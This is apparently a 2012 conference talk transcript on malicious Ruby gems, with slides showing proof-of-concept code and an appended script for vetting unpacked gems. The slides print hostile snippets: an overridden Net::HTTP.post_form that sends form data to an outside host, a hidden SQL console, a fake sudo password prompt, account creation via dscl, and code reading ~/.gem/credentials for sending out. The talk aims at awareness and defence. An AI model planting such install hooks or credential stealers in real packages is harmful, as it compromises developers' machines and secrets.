
Hacking with Gems

Do you ever use "gem install"? What about bundle?

What's the worst that could happen if your app has a dependency on a malicious gem? How easy would it be to write a gem that could compromise a box?

Much of the Ruby community blindly trusts its gems. This talk will make you second-guess that trust. It will also show you how to vet the gems you do choose to use.

Benjamin Smith

October 09, 2012
Transcript

  1. what's in my app?

     GEM
       remote: https://rubygems.org/
       specs:
         actionmailer (3.2.8)
           actionpack (= 3.2.8)
           mail (~> 2.4.4)
         actionpack (3.2.8)
           activemodel (= 3.2.8)
           activesupport (= 3.2.8)
           builder (~> 3.0.0)
           erubis (~> 2.7.0)
         ...
     Wednesday, October 10, 12
  2. show me the hack

     Net::HTTP.post_form(
       #<URI::HTTP:0x007fc76b706950 URL:http://stark-samurai-8122.herokuapp.com/logs>,
       {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...
     github.com/benjaminleesmith/net_http_detector
  3. how it works

     def HTTP.valid_post_form(url, params)
       ...
     def HTTP.post_form(url, params)
       self.smart_log(
         "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})"
       )
       Net::HTTP.valid_post_form(url, params)
     end
     github.com/benjaminleesmith/net_http_detector
  6. database what?

     append_before_filter :net_http_detector
     ...
     if params[:db_console]
       @tables = ActiveRecord::Base.connection.tables
       if params[:query]
         @output = ActiveRecord::Base.connection.execute(params[:query])
     github.com/benjaminleesmith/net_http_detector
  10. what it claims to do

      Date.new(2005, 1, 1).to_s(:short)
      => "1 Jan"
      ...instead of...
      => " 1 Jan"
      github.com/benjaminleesmith/better_date_to_s
  11. behind the curtain

      if(strcmp(rails_env, "production") == 0) {
        sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1", rails_root, rails_root);
        system(tar_command);
      }
      github.com/benjaminleesmith/better_date_to_s
  12. truth time

      • this gem doesn't actually work
      • but it could... if I wasn't lazy
      • "fat" gems are tricky to compile
      github.com/benjaminleesmith/better_date_to_s
  13. that was easy hard. what else can I do? (that's easier)
  14. what it does

      > true.should be_true
      > User.new.should be_true
      > User.new.should be_truthy
      github.com/benjaminleesmith/be_truthy
  15. run the what file?

      Gem::Specification.new do |gem|
        ...
        gem.extensions = ["Rakefile"]
        ...
      end
      github.com/benjaminleesmith/be_truthy
  16. gem fetch vs gem install

      > gem fetch be_truthy
      > gem unpack be_truthy-0.0.1.gem
      github.com/benjaminleesmith/be_truthy
  17. (the fake sudo)

      print "WARNING: Improper use of the sudo command ..."
      system "stty -echo"
      password = $stdin.gets.chomp
      system "stty echo"
      print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
      github.com/benjaminleesmith/be_truthy
  21. (adding an account)

      `/usr/bin/sudo dscl . -create /Users/#{username}`
      ...
      `/usr/bin/sudo dscl . -passwd /Users/#{username} password`
      github.com/benjaminleesmith/be_truthy
  22. back to the truthy_gem

      gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
      gem_list = `gem list`
      Net::HTTP.post_form(...)
      github.com/benjaminleesmith/be_truthy
  26. (how it gets published)

      > git clone your-gem-repo
      ...add a little code...
      > rake build
      > gem push your-gem
      github.com/benjaminleesmith/be_truthy
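The vetting step the "gem fetch vs gem install" slide recommends, carried a bit further, as an added example that is not part of the talk or of the be_truthy project: after `gem unpack`, check the gemspec for install-time hooks (an `extensions` entry that is not an `extconf.rb`, the trick from the "run the what file?" slide), for prebuilt binaries, and grep the source for the behaviours shown on the "back to the truthy_gem" slide. The `vet_gem` function, the pattern list and the constructed sample gem are all assumptions made here.

```ruby
# Added example, not from the talk: a first-pass vetting of an unpacked gem.
require "rubygems"

# Behaviours a date formatter or RSpec matcher has no business having.
# The pattern set is an assumption; extend it for your own stack.
SUSPECT_PATTERNS = {
  "network call"      => /Net::HTTP|open-uri|TCPSocket/,
  "shell execution"   => /`[^`]+`|\bsystem\b|\bexec\b|%x\{/,
  "credential access" => /\.gem\/credentials|\.ssh\b|\.netrc/,
  "privilege tooling" => /\bsudo\b|\bdscl\b/,
  "reopens framework" => /^\s*(class|module)\s+(Net(::HTTP)?|ActiveRecord::Base|ActionController::Base)\b/,
}.freeze

# spec: a Gem::Specification; files: { "relative/path" => source text }.
# Returns an array of finding strings; empty means nothing tripped.
def vet_gem(spec, files)
  findings = []
  # `gem install` runs whatever `extensions` lists; anything other than an
  # extconf.rb (a C extension build script) is an install-time code hook.
  spec.extensions.each do |ext|
    next if File.basename(ext) == "extconf.rb"
    findings << "install-time hook: extensions includes #{ext.inspect}"
  end
  # "Fat" gems ship compiled code you cannot read in the unpacked tree.
  binaries = spec.files.grep(/\.(so|bundle|dll)\z/)
  findings << "prebuilt binaries: #{binaries.join(', ')}" unless binaries.empty?
  files.each do |path, src|
    src.each_line.with_index(1) do |line, no|
      SUSPECT_PATTERNS.each do |label, re|
        findings << "#{label} in #{path}:#{no}: #{line.strip}" if line =~ re
      end
    end
  end
  findings
end

# Constructed sample mirroring the be_truthy slides (not the real gem's files).
SAMPLE_SPEC = Gem::Specification.new do |s|
  s.name = "be_truthy"
  s.version = "0.0.1"
  s.files = ["Rakefile", "lib/be_truthy.rb"]
  s.extensions = ["Rakefile"]
end
SAMPLE_FILES = {
  "Rakefile" => "gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read\n" \
                "Net::HTTP.post_form(uri, 'key' => gem_api_key)\n",
  "lib/be_truthy.rb" => "RSpec::Matchers.define :be_truthy do\n  match { |v| !!v }\nend\n",
}.freeze

puts vet_gem(SAMPLE_SPEC, SAMPLE_FILES) if __FILE__ == $0
```

Run it against a tree produced by `gem unpack`: read each file under the unpacked directory into the hash and load the gemspec with `Gem::Specification.load`, then treat any finding as a reason to read that file before you `gem install`.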